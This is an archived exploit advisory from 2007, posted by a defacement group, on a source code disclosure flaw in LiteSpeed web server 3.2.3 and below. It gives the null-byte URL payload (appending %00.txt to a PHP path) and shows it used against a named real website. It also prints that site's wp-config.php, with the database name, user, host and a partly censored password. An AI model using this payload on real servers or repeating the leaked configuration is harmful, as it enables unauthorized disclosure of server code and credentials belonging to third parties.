what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

litespeed-disclose.txt

litespeed-disclose.txt
Posted Oct 22, 2007
Authored by Tr3mbl3r | Site thedefaced.org

LiteSpeed web server versions 3.2.3 and below suffers from a remote source code disclosure vulnerability.

tags | exploit, remote, web, info disclosure
SHA-256 | 10f706a81bb0241c74ca93f5df3344a25ac69a97da71e3836c744c71264ece91

litespeed-disclose.txt

Change Mirror Download
########################################################################################
########### _______ __ _____ ___ __ ###########
########### |_ _| |--.-----.| \.-----.' _|.---.-.----.-----.--| | ###########
########### | | | | -__|| -- | -__| _|| _ | __| -__| _ | ###########
########### |___| |__|__|_____||_____/|_____|__| |___._|____|_____|_____| ###########
########### ###########
########### TheDefaced.org ###########
########### TheDefaced Security Team Presents An 0-day. ###########
########### LiteSpeed Remote Mime Type Injection ###########
########### Discovered by:Tr3mbl3r ###########
########### Shouts to his kitty kats and tacos. ###########
########################################################################################
# Product: #
# LiteSpeed/Discovered in <==3.2.3 Should work in all other versions below. #
# #
# Vuln: #
# Remote Mime Type Injection #
# #
# Description: #
# Litespeed will parse an URL/Files mimetype incorrectly. #
# When given a nullbyte. #
# #
# Patch: #
# Upgrade to LiteSpeed 3.2.4 has just been released today. #
# 9:15AM PST OCT 22 When I wrote this it's now 9:30AM PST OCT 22 #
# #
# This vuln was found before an update was released they fixed it after they found it..#
# In their logs. #
# #
# Risk: Extremely High #
########################################################################################
# Example: #
# Basicly if you had a URL like so http://www.site.com/index.php. #
# And you wanted this websites source you could simply add a nullbyte and an extension #
# Like So http://www.site.com/index.php%00.txt #
# Litespeed would then at this point asume the file is a txt file. #
# #
# Keep in mind that this vuln is Mime Type Injection... so it works with any type. #
# Like if you did %00.rar it would asume the index.php was a rar file. #
# Theres a numerous ammount of things you could do. #
# #
# As to of why litespeed does this is not confirmed by us just yet. #
# #
# I asume it has somthing to do with mimetype handling thus the name of the exploit. #
# MimeType Injection. #
########################################################################################
# An Example of This Vuln being put in to use. #
# #
# The Following is WordPress.com's Wp-Config.php #
# http://wordpress.com/wp-config.php%00.txt #
########################################################################################
# ###########
# <?php #
# #
# // This is probably useless? #
# define('DB_NAME', 'wpmu'); // The name of the database #
# define('DB_USER', 'wpmu'); // Your MySQL username #
# define('DB_PASSWORD', 'JTO5T**CENSOR-HERE**'); // ...and password #
# define('DB_HOST', 'two.wordpress.com'); // 99% chance you won't need to change this value #
# #
# require('define.php'); #
# #
# require(ABSPATH . 'wpmu-settings.php'); #
# #
# ?> #
# #
##################################################################################################
# Contact Us #
##################################################################################################
# WebSite: http://www.thedefaced.org #
# Forums for more info: http://www.thedefaced.org/forums/ #
# IRC: irc.thedefaced.org/#TheDefaced #
##################################################################################################

Login or Register to add favorites

File Archive:

March 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    13 Files
  • 3
    Mar 3rd
    15 Files
  • 4
    Mar 4th
    0 Files
  • 5
    Mar 5th
    0 Files
  • 6
    Mar 6th
    16 Files
  • 7
    Mar 7th
    31 Files
  • 8
    Mar 8th
    16 Files
  • 9
    Mar 9th
    13 Files
  • 10
    Mar 10th
    9 Files
  • 11
    Mar 11th
    0 Files
  • 12
    Mar 12th
    0 Files
  • 13
    Mar 13th
    10 Files
  • 14
    Mar 14th
    6 Files
  • 15
    Mar 15th
    17 Files
  • 16
    Mar 16th
    22 Files
  • 17
    Mar 17th
    13 Files
  • 18
    Mar 18th
    0 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    16 Files
  • 21
    Mar 21st
    13 Files
  • 22
    Mar 22nd
    5 Files
  • 23
    Mar 23rd
    6 Files
  • 24
    Mar 24th
    47 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    50 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    7 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close